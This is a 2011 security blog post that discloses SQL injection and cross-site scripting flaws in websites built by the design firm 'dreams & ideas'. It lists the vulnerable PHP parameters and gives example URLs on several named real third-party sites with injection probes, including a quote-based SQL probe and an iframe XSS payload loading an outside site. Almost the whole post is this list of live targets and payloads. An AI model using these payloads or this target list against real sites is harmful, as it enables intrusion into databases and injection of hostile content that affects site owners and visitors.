dreams & ideas web design multiple vulnerabilities ~ Random stuff by yappare

Saturday, October 22, 2011

dreams & ideas web design multiple vulnerabilities

on October 22, 2011 in Security, SQLi No comments

Title : dreams & ideas web design multiple vulnerabilities
Found : 22 October 2011
Web : http://www.dreamsandideas.com

[sql]
1 - products.php?CatID=[sql]
2 - news_details.php?nid=[sql]
3 - success_story_details.php?sid=[sql]
4 - inside.php?id=[sql]
5 - contact.php?id=[sql]
6 - visaupdate_details.php?vid=[sql]
7 - products.php?BrandID=[sql]
8 - more..

Examples :

http://www.alfabetaedu.com/news_details.php?nid=31'
http://www.neoteric.com.np/products.php?BrandID=2'
http://www.cybersansar.com/article_list.php?pageno=1
POST frdate=2011-10-22&todate=2011-10-22&list_article=-Select-&keyword='&Submit=Submit
http://www.enasha.com/bnb_profile.php?pid=148'

[xss]

1 - search.php
2 - search_result.php?mk=

Examples :
http://www.afn.org.np/search.php
POST keyword=<iframe src=http://www.1337day.com />&search.x=0&search.y=0
http://www.enasha.com/search_result.php?mk=Toyota<iframe src=http://www.1337day.com />

~/p0pc0rn/~

Random stuff by yappare

Saturday, October 22, 2011

dreams & ideas web design multiple vulnerabilities

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories